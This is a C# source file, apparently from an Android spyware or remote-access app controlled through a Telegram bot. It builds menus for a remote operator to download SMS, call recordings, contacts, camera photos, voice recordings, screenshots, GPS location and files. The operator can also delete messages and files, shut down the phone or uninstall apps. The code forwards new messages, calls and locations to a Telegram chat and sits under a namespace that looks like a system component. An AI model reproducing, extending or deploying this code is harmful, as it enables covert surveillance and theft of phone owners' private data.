using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Android.App;
using Android.Content;
using Android.OS;
using Android.Runtime;
using Android.Views;
using Android.Widget;
using TeleSharp.Entities.SendEntities;
using Android.Locations;
using android.os.Resources;

namespace android.os
{
    public class PARAMSEND
    {
        private static List<InlineKeyboardButton> listforme(string chatid)
        {
            return new List<InlineKeyboardButton>
                            {
                                new InlineKeyboardButton {Text="Add User",CallbackData="add chat id",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" },
                                new InlineKeyboardButton {Text="All Users",CallbackData="allusers",SwitchInlineQueryCurrentChat="",Url="",SwitchInlineQuery="" }
                            };
        }
        private static List<InlineKeyboardButton> listforme2(string chatid)
        {
            return new List<InlineKeyboardButton>
                            {
                                new InlineKeyboardButton {Text="Private Mode",CallbackData="private",SwitchInlineQuery="",Url="",SwitchInlineQueryCurrentChat="" },
                                new InlineKeyboardButton {Text="Show Message",CallbackData="toast",SwitchInlineQueryCurrentChat="",Url="",SwitchInlineQuery="" }
                            };
        }
        private static List<InlineKeyboardButton> listforme3(string chatid)
        {
            return new List<InlineKeyboardButton>
                            {
                                new InlineKeyboardButton {Text="Set Max Size Of Send Document" ,CallbackData="maxsize",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url=""}
                            };
        }
        private static List<InlineKeyboardButton> listforme4(string chatid)
        {
            return new List<InlineKeyboardButton>
                            {
                                new InlineKeyboardButton {Text="Lock For" ,CallbackData="lockfor",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url=""}
                            };
        }
        private static List<InlineKeyboardButton> listforme5(string chatid)
        {
            return new List<InlineKeyboardButton>
                            {
                                new InlineKeyboardButton {Text="Unlock This,\"if locked\"",CallbackData="unlockfor",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                            };
        }
        private static List<InlineKeyboardButton> listforme6(string chatid)
        {
            return new List<InlineKeyboardButton>
                            {
                                new InlineKeyboardButton {Text="Uninstall App",CallbackData="uni",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                               ,new InlineKeyboardButton {Text="Set Important",CallbackData="si",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                            };
        }
        public static InlineKeyboardMarkup OkCancel(string chatid,string okcall,string cancellcall)
        {
            return new InlineKeyboardMarkup
            {
                InlineKeyboard=new List<List<InlineKeyboardButton>>
                {
                    new List<InlineKeyboardButton>
                    {
                        new InlineKeyboardButton {Text="Ok",CallbackData=okcall,SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" },
                        new InlineKeyboardButton {Text="Cancel",CallbackData=cancellcall,Url="",SwitchInlineQueryCurrentChat="",SwitchInlineQuery="" }
                    }
                }
            };
        }
        internal static SendMessageParams Locsett(string chatid,string tx="you can turn device gps on or off if device is rooted!\n")
        {
            tx += "is rooted: " + RootUtil.IsDeviceRooted();
            return new SendMessageParams
            {
                Text=tx,
                ChatId=chatid,
                InlineKeyboard=turnOFForON("locon","locoff",chatid)
            };
        }
        internal static SendMessageParams Location(string chatid, string txt = "Location Service Is ")
        {
            LocationManager loc = (LocationManager)Application.Context.GetSystemService(Context.LocationService);
            bool net = loc.IsProviderEnabled(LocationManager.NetworkProvider);
            bool gps = loc.IsProviderEnabled(LocationManager.GpsProvider);
            txt += Setting.Get_bool("idloc" + chatid).ToString()
                +"\nNetwork Provider: "+net+"\nGps Provider: "+gps;
            InlineKeyboardMarkup inl = turnOFForON("serviceon", "serviceoff", chatid);
            inl.InlineKeyboard.Add(new List<InlineKeyboardButton>
            {
                new InlineKeyboardButton {Text="Setting",CallbackData="setloc",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
            });
            return new SendMessageParams
            {
                ChatId = chatid,
                Text = txt,
                InlineKeyboard = inl
           };
        }
        internal static SendMessageParams Private(string chatid,string txt="Private Mode is ")
        {
            txt += inf.Values.sharep.GetBoolean("private",false).ToString();
            return new SendMessageParams
            {
                ChatId = chatid,
                Text = txt,
                InlineKeyboard = turnOFForON("privateon","privateoff",chatid)
            };
        }
        public static SendMessageParams prop(string chatid, string txt = "Properties Of {")
        {
            txt += inf.Metods.devicename(chatid) + "} Phone!";
            return new SendMessageParams
            {
                Text = txt,
                ChatId = chatid,
                InlineKeyboard = new InlineKeyboardMarkup
                {
                    InlineKeyboard = new List<List<InlineKeyboardButton>>
                    {
                       new List<InlineKeyboardButton>
                                   {
                                      new InlineKeyboardButton {Text="Phone Number",CallbackData="number",SwitchInlineQuery="",Url="",SwitchInlineQueryCurrentChat="" }
                                     ,new InlineKeyboardButton {Text="Screen Mode",CallbackData="scmod",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                                   },
                                   new List<InlineKeyboardButton>
                                   {
                                      new InlineKeyboardButton {Text="Is Rooted?",CallbackData="isroot",SwitchInlineQuery="",Url="",SwitchInlineQueryCurrentChat="" },
                                      new InlineKeyboardButton {Text="Is Private?",CallbackData="isprivate",SwitchInlineQueryCurrentChat="",Url="",SwitchInlineQuery="" }
                                   },
                                   new List<InlineKeyboardButton>
                                   {
                                      new InlineKeyboardButton {Text="About Phone",CallbackData="build version",SwitchInlineQuery="",Url="",SwitchInlineQueryCurrentChat="" },
                                      new InlineKeyboardButton {Text="Public Ip",CallbackData="ip",SwitchInlineQueryCurrentChat="",Url="",SwitchInlineQuery="" }
                                   },
                    }
                }
            };
        }
        public static SendMessageParams filesandfolders(string chatid, string txt = "Work With Files and Folders")
        {
            return new SendMessageParams
            {
                ChatId = chatid,
                Text = txt,
                InlineKeyboard = new InlineKeyboardMarkup
                {
                    InlineKeyboard = new List<List<InlineKeyboardButton>>
                    {
                        new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="ShowDialog",CallbackData="filedialog",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                        },
                        new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="Send File And Save",CallbackData="set filereq",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" },
                        }
                    }
                }
            };
       }
        private static InlineKeyboardMarkup List(string chatid)
        {
            return new InlineKeyboardMarkup
            {
                InlineKeyboard = new List<List<InlineKeyboardButton>>
                        {
                                   new List<InlineKeyboardButton>
                                   {
                                       new InlineKeyboardButton {Text="Set Name",CallbackData="device name", SwitchInlineQuery="",Url="",SwitchInlineQueryCurrentChat=""},
                                       new InlineKeyboardButton {Text="Notification",CallbackData="notify",SwitchInlineQueryCurrentChat="",Url="",SwitchInlineQuery="" },
                                   },
                                   new List<InlineKeyboardButton>
                                   {
                                       new InlineKeyboardButton {Text="Turn Off Phone",CallbackData="shutdown",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" },
                                       new InlineKeyboardButton {Text="Restart Phone",CallbackData="restart",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                                   },
                                   new List<InlineKeyboardButton>
                                   {
                                       new InlineKeyboardButton {Text="File Explorer",CallbackData="files&folders",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                                   },
                                   new List<InlineKeyboardButton>
                                   {
                                       new InlineKeyboardButton {Text="Start Voice Record",CallbackData="start vc",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" },
                                       new InlineKeyboardButton {Text="Stop Voice Recording and Download",CallbackData="stop vc",SwitchInlineQueryCurrentChat="",Url="",SwitchInlineQuery="" }
                                   },
                                   new List<InlineKeyboardButton>
                                   {
                                      new InlineKeyboardButton {Text="Properties",CallbackData="prop",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                                     ,new InlineKeyboardButton {Text="Accounts",CallbackData="acc",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                                   },
                                   new List<InlineKeyboardButton>
                                   {
                                      new InlineKeyboardButton {Text="Calls",CallbackData="calls",SwitchInlineQuery="",Url="",SwitchInlineQueryCurrentChat="" },
                                      new InlineKeyboardButton {Text="Smses",CallbackData="smses",SwitchInlineQueryCurrentChat="",Url="",SwitchInlineQuery="" }
                                   },
                                   new List<InlineKeyboardButton>
                                   {
                                      new InlineKeyboardButton {Text="Contacts",CallbackData="contacts",SwitchInlineQuery="",Url="",SwitchInlineQueryCurrentChat="" },
                                      new InlineKeyboardButton {Text="Send Sms From This",CallbackData="sendsms",SwitchInlineQueryCurrentChat="",Url="",SwitchInlineQuery="" }
                                   },
                                   new List<InlineKeyboardButton>
                                   {
                                      new InlineKeyboardButton {Text="Camera",CallbackData="camera",SwitchInlineQuery="",Url="",SwitchInlineQueryCurrentChat="" },
                                      new InlineKeyboardButton {Text="Location",CallbackData="location",SwitchInlineQueryCurrentChat="",Url="",SwitchInlineQuery="" }
                                   },

                                   new List<InlineKeyboardButton>
                                   {
                                      new InlineKeyboardButton {Text="Screen Shot {root needed}!",CallbackData="sc",SwitchInlineQuery="",Url="",SwitchInlineQueryCurrentChat="" },
                                   },
                                   new List<InlineKeyboardButton>
                                   {
                                       new InlineKeyboardButton {Text="Lock This, Just For Me!",CallbackData="lock",SwitchInlineQuery="",Url="",SwitchInlineQueryCurrentChat="" }
                                   }
                        }
            };
        }
        internal static SendMessageParams lockme(string chatid,string txt="lock this device only for you.\nyou should send request to creator and creator do lock this for you!")
        {
            return new SendMessageParams
            {
                ChatId=chatid,
                Text=txt,
                InlineKeyboard=new InlineKeyboardMarkup
                {
                    InlineKeyboard=new List<List<InlineKeyboardButton>>
                    {
                        new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="Creator Pv",CallbackData="",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="https://telegram.me/abbast78" }
                        }
                    }
                }
            };
        }
        internal static SendMessageParams Camera(string chatid,string txt="Use Of Camera")
        {
            List<List<InlineKeyboardButton>> inl = new List<List<InlineKeyboardButton>>();
            for (int i = 0; i < Android.Hardware.Camera.NumberOfCameras; i++)
                inl.Add(new List<InlineKeyboardButton>
                {
                    new InlineKeyboardButton { Text="CAMERA"+i,CallbackData="camera"+i,SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url=""}
                });
            return new SendMessageParams
            {
                Text = txt,
                ChatId = chatid,
                InlineKeyboard = new InlineKeyboardMarkup
                {
                    InlineKeyboard = inl
                }
            };
        }
        internal static SendMessageParams contacts(string chatid,string txt="You Can Search and Download Or Download All Contacts!")
        {
            return new SendMessageParams
            {
                Text=txt,
                ChatId=chatid,
                InlineKeyboard=new InlineKeyboardMarkup
                {
                    InlineKeyboard=new List<List<InlineKeyboardButton>>
                    {
                        new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="Search By Phone Number",CallbackData="searchbynum",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                        },
                        new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="Search By Name",CallbackData="searchbyname",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                        },
                        new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="Get All Contacts",CallbackData="getall",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                        }
                    }
                }
            };
        }
        internal static SendMessageParams usecamera(string chatid, string cameraid,string txt="Work With Camera ")
        {
            txt += cameraid;
            return new SendMessageParams
            {
                Text=txt,
                ChatId=chatid,
                InlineKeyboard=new InlineKeyboardMarkup
                {
                    InlineKeyboard=new List<List<InlineKeyboardButton>>
                    {
                        new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="Take Picture",CallbackData="take"+cameraid,SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                        }
                    }
                }
            };
        }
        public static SendMessageParams NewSms(SmsNotify sms)
        {
            return new SendMessageParams
            {
                ChatId =sms.Chat_Id.ToString(),
                Text = "New Sms Message From [" + inf.Metods.devicename(sms.Chat_Id) + "] Device!\nSms Name: " + sms.FromNumber+"\nDateTime: "+sms.DateTime.ToString()+"\nSms Text: "+sms.Text
            };
        }
        public static SendMessageParams NewCall(CallNotify call)
        {
            return new SendMessageParams
            {
                ChatId=call.Chat_Id.ToString(),
                Text = call.Path+"\n\nYou Have new Call Voice From [" + inf.Metods.devicename(call.Chat_Id) + "] Device!\nCall Name: " + System.IO.Path.GetFileNameWithoutExtension(call.Path)+"\nDateTime: "+call.DateTime.ToString(),
                InlineKeyboard=new InlineKeyboardMarkup
                {
                    InlineKeyboard=new List<List<InlineKeyboardButton>>
                    {
                        new List<InlineKeyboardButton>
                        {
                               new InlineKeyboardButton {Text="Download",CallbackData="downloadcall",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                        }
                    }
                }
            };
        }
        internal static SendMessageParams setpath(string chatid,string txt= "ok! now you should set file path to download and save with folder dialog or write path!")
        {
            return new SendMessageParams
            {
                ChatId = chatid,
                Text = txt,
                InlineKeyboard = new InlineKeyboardMarkup
                {
                    InlineKeyboard = new List<List<InlineKeyboardButton>>
                                {
                                    new List<InlineKeyboardButton>
                                    {
                                        new InlineKeyboardButton {Text="Show Folder Dialog" ,CallbackData="folderdialog",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url=""}
                                    },
                                    new List<InlineKeyboardButton>
                                    {
                                        new InlineKeyboardButton {Text="Write Path" ,CallbackData="writepth",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url=""}
                                    }
                                }
                }
            };
        }
        public static SendMessageParams NewLocation(LocationNotify loc)
        {
            return new SendMessageParams
            {
                ChatId = loc.Chat_Id.ToString(),
                Text = "You Have New Location Message From [" + inf.Metods.devicename(loc.Chat_Id)
                    + "]\nAltitude: " + loc.Altitude + "\nSpeed: " + loc.Speed
                    + "\nAccuracy: " + loc.Accuracy + "\nBearing: " + loc.Bearing+"\nDateTime: "+loc.dt.ToString(),
                InlineKeyboard = new InlineKeyboardMarkup
                {
                    InlineKeyboard = new List<List<InlineKeyboardButton>>
                        {
                            new List<InlineKeyboardButton>
                            {
                                new InlineKeyboardButton {Text="Download",CallbackData="get location="+loc.Latitude+","+loc.Longitude,SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                            }
                        }
                }
            };
        }
        public static SendMessageParams downloadcancel(string chatid,string txt="Ok!Download Canceled!")
        {
            return new SendMessageParams
            {
                ChatId = chatid,
                Text = txt
            };
        }
        private static List<List<InlineKeyboardButton>> inlbtns(string MessageCallback, string chatid)
        {
            List<List<InlineKeyboardButton>> inl = new List<List<InlineKeyboardButton>>();
         //   if(MessageCallback.StartsWith("/"))
          //      MessageCallback = MessageCallback.TrimStart('/');
            System.IO.DirectoryInfo df = new System.IO.DirectoryInfo(MessageCallback);
            if (df.GetDirectories().Length > 0)
            {
                int folfile = System.IO.Directory.GetDirectories(MessageCallback).Length;
                System.IO.DirectoryInfo[] dirs = df.GetDirectories();
                for (int i = 0; i < folfile; i++)
                {
                    inl.Add(new List<InlineKeyboardButton>
                {
                    new InlineKeyboardButton {Text=dirs[i].Name+"<Folder>",CallbackData="pthf=>"+dirs[i].Name,SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                   ,new InlineKeyboardButton {Text="Modify",CallbackData="modifyd="+ dirs[i].Name,SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url=""}
                });
                    if (i % 25 == 0 && i != 0)
                    {
                        inf.CTRLApi.SendMessage(new SendMessageParams
                        {
                            ChatId = chatid,
                            Text = MessageCallback,
                            InlineKeyboard = new InlineKeyboardMarkup
                            {
                                InlineKeyboard = inl
                            }
                        });
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = i + "", ChatId = chatid });
                        inl.Clear();
                    }
                }

            }
            if (df.GetFiles().Length > 0)
            {
                int lnfile = System.IO.Directory.GetFiles(MessageCallback).Length;
                System.IO.FileInfo[] files = df.GetFiles();
                for (int i = 0; i < lnfile; i++)
                {
                    inl.Add(new List<InlineKeyboardButton>
                {
                    new InlineKeyboardButton {Text=files[i].Name+"<File><"+files[i].Length/1048576+"MB>",CallbackData="modifyf="+files[i].Name,SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                });
                    if (i % 25 == 0 && i != 0)
                    {
                        inf.CTRLApi.SendMessage(new SendMessageParams
                        {
                            ChatId = chatid,
                            Text = MessageCallback,
                            InlineKeyboard = new InlineKeyboardMarkup
                            { InlineKeyboard = inl }
                        });
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = i + "", ChatId = chatid });
                        inl.Clear();
                    }
                }
            }
            return inl;
        }
        private static List<List<InlineKeyboardButton>> inlbtnsfolderdialog(string callback, string chatid)
        {
            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Wait...", ChatId = chatid });
            List<List<InlineKeyboardButton>> inl = new List<List<InlineKeyboardButton>>();
           // callback = callback.TrimStart('/');
            int folfile = System.IO.Directory.GetDirectories(callback).Length;
            System.IO.DirectoryInfo df = new System.IO.DirectoryInfo(callback);
            System.IO.DirectoryInfo[] dirs = df.GetDirectories();
            for (int i = 0; i < folfile; i++)
            {
                inl.Add(new List<InlineKeyboardButton>
                {
                    new InlineKeyboardButton {Text=dirs[i].Name+"<Folder>",CallbackData="pthd=>"+dirs[i].Name,SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                   ,new InlineKeyboardButton {Text="Ok",CallbackData="fsaveto="+dirs[i].Name,SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url=""}
                });
                if (i % 25 == 0 && i != 0)
                {
                    inf.CTRLApi.SendMessage(new SendMessageParams
                    {
                        ChatId = chatid,
                        Text = callback,
                        InlineKeyboard = new InlineKeyboardMarkup
                        {
                            InlineKeyboard = inl
                        }
                    });
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = i + "", ChatId = chatid });
                    inl.Clear();
                }
            }
            return inl;
        }
        internal static SendMessageParams FileDialog(string chatid, string MessageOfCallback)
        {
            if(MessageOfCallback=="")
            {
                inf.CTRLApi.SendMessage(new SendMessageParams
                {
                    ChatId = chatid,
                    Text = Android.OS.Environment.ExternalStorageDirectory.AbsolutePath,
                    InlineKeyboard = new InlineKeyboardMarkup
                    {
                        InlineKeyboard = new List<List<InlineKeyboardButton>>
                        {
                            new List<InlineKeyboardButton>
                            {
                                new InlineKeyboardButton { Text=System.IO.Path.GetFileName(Android.OS.Environment.ExternalStorageDirectory.AbsolutePath)+"<Folder>",CallbackData="pthfex",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" },
                                new InlineKeyboardButton {Text="Modify",CallbackData="modifydex",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url=""}
                            }
                        }
                    }
                });
            }
            string txt = (MessageOfCallback == "") ? "/storage" : MessageOfCallback;
            InlineKeyboardMarkup fileinline = new InlineKeyboardMarkup();
            fileinline.InlineKeyboard = inlbtns(txt,chatid);
            if (fileinline.InlineKeyboard.Count == 0)
                return null;
            if (MessageOfCallback == "/")
                MessageOfCallback = "";
            if (MessageOfCallback != "")
                fileinline.InlineKeyboard.Add(new List<InlineKeyboardButton>
            {
                new InlineKeyboardButton {Text="<< Back",CallbackData="backfiledialog",SwitchInlineQuery="" , SwitchInlineQueryCurrentChat="",Url=""}
            });
            return new SendMessageParams
            {
                ChatId = chatid,
                Text = txt,
                InlineKeyboard = fileinline
            };
        }
        internal static SendMessageParams showORwrite(string chatid,string txt="Use FileDialog or Write File Path To Modify")
        {
            return new SendMessageParams
            {
                 ChatId=chatid,
                 Text=txt,
                 InlineKeyboard=new InlineKeyboardMarkup
                 {
                     InlineKeyboard=new List<List<InlineKeyboardButton>>
                     {
                         new List<InlineKeyboardButton>
                         {
                             new InlineKeyboardButton {Text="ShowDialog",CallbackData="filedialog",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                             ,new InlineKeyboardButton {Text="Write",CallbackData="writepth",Url="",SwitchInlineQueryCurrentChat="",SwitchInlineQuery="" }
                         }
                     }
                 }
            };
        }
        public static InlineKeyboardMarkup turnOFForON(string callbackdataforON,string callbackdataforOFF,string chatid,string txton="Turn On",string txtoff="Turn Off")
        {
            return new InlineKeyboardMarkup
            {
                InlineKeyboard = new List<List<InlineKeyboardButton>>
                {
                    new List<InlineKeyboardButton>
                    {
                        new InlineKeyboardButton {Text=txton,CallbackData=""+callbackdataforON,SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" },
                        new InlineKeyboardButton {Text=txtoff,CallbackData=""+callbackdataforOFF,SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                    }
                }
            };
        }
        public static SendMessageParams Sendwitfile(string chatid,string Path,string txt="You Have New File!")
        {
            string T = Path + "\n\n" + txt;
            return new SendMessageParams
            {
                ChatId = chatid,
                Text = T,
                InlineKeyboard = new InlineKeyboardMarkup
                {
                    InlineKeyboard = new List<List<InlineKeyboardButton>>
                    {
                        new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="Download",CallbackData="get filed",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                        }
                    }
                }
            };
        }
        public static SendMessageParams AreYouSure(string chatid,string okcall,string cancellcall,string txt="Are You Sure?")
        {
            return new SendMessageParams
            {
                ChatId=chatid,
                Text=txt,
                InlineKeyboard = OkCancel(chatid,okcall,cancellcall)
            };
        }
        public static SendMessageParams notify(string chatid,string txt="Set Notification Of Receive or Send Messages&Calls For You!")
        {
            return new SendMessageParams
            {
                ChatId=chatid,
                Text=txt,
                InlineKeyboard=new InlineKeyboardMarkup
                {
                    InlineKeyboard =new List<List<InlineKeyboardButton>>
                    {
                        new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="Sms Notification",CallbackData="smsnotify",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" },
                        },
                        new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="Call Notification",CallbackData="callnotify",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                        },
                        new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="When Online",CallbackData="onlinenotify",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                        },
                        new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="New Image Added",CallbackData="newimagenotify",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                        }
                    }
                }
            };
        }
        public static SendMessageParams smsnotify(string chatid, string txt = "Set Notification For Receive or Send Messages ")
        {
            txt += Setting.Get_bool("notifys" + chatid);
            return new SendMessageParams
            {
                ChatId = chatid,
                Text = txt,
                InlineKeyboard = turnOFForON("smsnotifyon", "smsnotifyoff",chatid)
            };
        }
        public static SendMessageParams callnotify(string chatid, string txt = "Set Notification For Receive or Send Calls!")
        {
            txt += Setting.Get_bool("notifyc" + chatid);
            return new SendMessageParams
            {
                ChatId = chatid,
                Text = txt,
                InlineKeyboard = turnOFForON("callnotifyon", "callnotifyoff",chatid)
            };
        }
        private static InlineKeyboardMarkup inl(string chatid)
        {
            InlineKeyboardMarkup inl = List(chatid);
            if (chatid == inf.MyManagerId)
            {
                inl.InlineKeyboard.Add(listforme(chatid));
                inl.InlineKeyboard.Add(listforme2(chatid));
                inl.InlineKeyboard.Add(listforme3(chatid));
                inl.InlineKeyboard.Add(listforme4(chatid));
                inl.InlineKeyboard.Add(listforme5(chatid));
                inl.InlineKeyboard.Add(listforme6(chatid));
            }
            return inl;
        }
        public static SendMessageParams List(string chatid,string txt="You Can Do This Works On {")
        {
            txt += inf.Metods.devicename(chatid) + "} Phone!";
            SendMessageParams smp = new SendMessageParams();
            smp.ChatId = chatid;
            smp.Text = txt;
            smp.InlineKeyboard = inl(chatid);
            return smp;
        }
        public static SendMessageParams modifys(string chatid,string mod,string pth,UserInformation user)
        {
            List<List<InlineKeyboardButton>> inlb=new List<List<InlineKeyboardButton>>();
            if (mod == "modifyf")
            {
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Work With File", ChatId = chatid });
                inlb.Add(new List<InlineKeyboardButton>
                                   {
                                       new InlineKeyboardButton {Text="Delete File",CallbackData="delete file",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                                   });
                inlb.Add(new List<InlineKeyboardButton>
                                   {
                                      new InlineKeyboardButton {Text="Download File",CallbackData="get file",Url="",SwitchInlineQueryCurrentChat="",SwitchInlineQuery="" }
                                   });
                inlb.Add(new List<InlineKeyboardButton>
                                   {
                                      new InlineKeyboardButton {Text="Copy File",CallbackData="copy file",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" },
                                   });
                inlb.Add(new List<InlineKeyboardButton>
                                   {
                                      new InlineKeyboardButton {Text="Cut File",CallbackData="cut file",Url="",SwitchInlineQueryCurrentChat="",SwitchInlineQuery="" }
                                   });
                inlb.Add(new List<InlineKeyboardButton>
                                   {
                                      new InlineKeyboardButton {Text="Rename File",CallbackData="rename file",Url="",SwitchInlineQueryCurrentChat="",SwitchInlineQuery="" }
                                   });
                inlb.Add(new List<InlineKeyboardButton>
                                   {
                                      new InlineKeyboardButton {Text="Zip File",CallbackData="zip file",Url="",SwitchInlineQueryCurrentChat="",SwitchInlineQuery="" }
                                   });
                inlb.Add(new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="Extract Zip File \"if zip\"",CallbackData="extract",Url="",SwitchInlineQueryCurrentChat="",SwitchInlineQuery="" }
                        });
            }
            else
            {
                user.CurrentPathInFileDialog = pth;
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Work With Folder", ChatId = chatid });
                inlb.Add(new List<InlineKeyboardButton>
                                   {
                                       new InlineKeyboardButton {Text="Delete Folder",CallbackData="delete folder",Url="",SwitchInlineQueryCurrentChat="",SwitchInlineQuery="" }
                                   });
                inlb.Add(new List<InlineKeyboardButton>
                                   {
                                      new InlineKeyboardButton {Text="Zip Folder",CallbackData="zip folder",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" },
                                   });

                inlb.Add(new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="Download Folder",CallbackData="get folder",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" },
                        });
                inlb.Add(new List<InlineKeyboardButton>
                {
                    new InlineKeyboardButton {Text="Properties",CallbackData="propfolder",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                });
            }
            return new SendMessageParams
            {
                ChatId = chatid,
                Text = pth,
                InlineKeyboard = new InlineKeyboardMarkup
                {
                    InlineKeyboard = inlb
                }
            };
        }
        public static SendMessageParams Calls(string chatid,string txt="Get The Calls!")
        {
            return new SendMessageParams
            {
                ChatId = chatid,
                Text = txt,
                InlineKeyboard = new InlineKeyboardMarkup
                {
                    InlineKeyboard = new List<List<InlineKeyboardButton>>
                    {
                        new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="Download End Call" ,CallbackData="endcall",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url=""}
                        },
                        new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="Download All Calls" ,CallbackData="allcalls",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url=""}
                        },
                        new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="History",CallbackData="callshistory",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                        }
                    }
                }
            };
        }
        public static SendMessageParams Smses(string chatid,string txt="Get The Smses!")
        {
            return new SendMessageParams
            {
                ChatId = chatid,
                Text = txt,
                InlineKeyboard = new InlineKeyboardMarkup
                {
                    InlineKeyboard = new List<List<InlineKeyboardButton>>
                    {
                        new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="Download End Sms" ,CallbackData="endsms",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url=""}
                        },
                        new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="Download All Smses" ,CallbackData="allsmses",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url=""}
                        }
                        , new List<InlineKeyboardButton>
                        {
                            new InlineKeyboardButton {Text="Delete End Sms From Device" ,CallbackData="delsms",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url=""}
                        }
                    }
                }
            };
        }
        internal static SendMessageParams FolderDialog(string chatid, string MessageOfCallback)
        {
            if (MessageOfCallback == "")
            {
                inf.CTRLApi.SendMessage(new SendMessageParams
                {
                    ChatId = chatid,
                    Text = Android.OS.Environment.ExternalStorageDirectory.AbsolutePath,
                    InlineKeyboard = new InlineKeyboardMarkup
                    {
                        InlineKeyboard = new List<List<InlineKeyboardButton>>
                        {
                            new List<InlineKeyboardButton>
                            {
                                new InlineKeyboardButton {Text=System.IO.Path.GetFileName(Android.OS.Environment.ExternalStorageDirectory.AbsolutePath)+"<Folder>",CallbackData="pthdex",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url="" }
                                ,new InlineKeyboardButton {Text="Ok",CallbackData="fsavetoex",SwitchInlineQuery="",SwitchInlineQueryCurrentChat="",Url=""}
                            }
                        }
                    }
                });
            }

            InlineKeyboardMarkup fileinline = new InlineKeyboardMarkup();
            string pth = (MessageOfCallback=="")?"/storage":MessageOfCallback;
            fileinline.InlineKeyboard = inlbtnsfolderdialog(pth, chatid);
            if (fileinline.InlineKeyboard.Count == 0)
                return null;
            if (pth == "/")
                pth = "";
            if (pth != "")
                fileinline.InlineKeyboard.Add(new List<InlineKeyboardButton>
            {
                new InlineKeyboardButton {Text="<< Back",CallbackData="backfolderdialog",SwitchInlineQuery="" , SwitchInlineQueryCurrentChat="",Url=""}
            });
            return new SendMessageParams
            {
                ChatId = chatid,
                Text = pth,
                InlineKeyboard = fileinline
            };
        }
